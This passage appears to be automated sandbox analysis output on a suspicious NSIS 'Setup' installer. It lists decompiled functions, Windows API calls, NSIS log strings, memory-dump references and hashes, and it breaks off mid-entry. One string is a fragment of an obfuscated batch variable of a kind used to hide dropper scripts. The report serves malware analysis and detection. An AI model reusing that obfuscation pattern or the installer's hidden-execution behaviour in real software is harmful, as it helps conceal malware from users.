Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: error, user retry, xrefs: 00401B40
148, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error, user abort, xrefs: 00401B53
File: error creating "%s", xrefs: 00401AF0
File: error, user cancel, xrefs: 00401B93
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: wrote %d to "%s", xrefs: 00401BD0
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: 148$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-2553613161
Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

soft, xrefs: 00403675
Null, xrefs: 0040367E
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
Error launching installer, xrefs: 004035D7
Inst, xrefs: 0040366C

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

Set Surface=rLhLobby-Roman-Slut-Smithsonian-David-Nottingham-HJxSpouse-fVSRecall-Hospitality-Fisheries-Una-Hungarian-Booty-Suite-WcJOAlerts-Brain-Funded-Qc-Acquisitions-WDXeSg-Slut-Caribbean-Conferences-Models-Chick-fEqgTransformation-Operator-Benj, xrefs: 004033A9
X1C, xrefs: 004033ED
... %d%%, xrefs: 0040349E
X1C, xrefs: 0040343C

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$Set Surface=rLhLobby-Roman-Slut-Smithsonian-David-Nottingham-HJxSpouse-fVSRecall-Hospitality-Fisheries-Una-Hungarian-Booty-Suite-WcJOAlerts-Brain-Funded-Qc-Acquisitions-WDXeSg-Slut-Caribbean-Conferences-Models-Chick-fEqgTransformation-Operator-Benj$X1C$X1C
API String ID: 651206458-3425723664
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNEL32(005BA348), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
148, xrefs: 00401EFB, 00401F00, 00401F1A
Exch: stack < %d elements, xrefs: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: 148$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-1287645248
Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

148, xrefs: 00402770
<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: 148$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-875226430
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
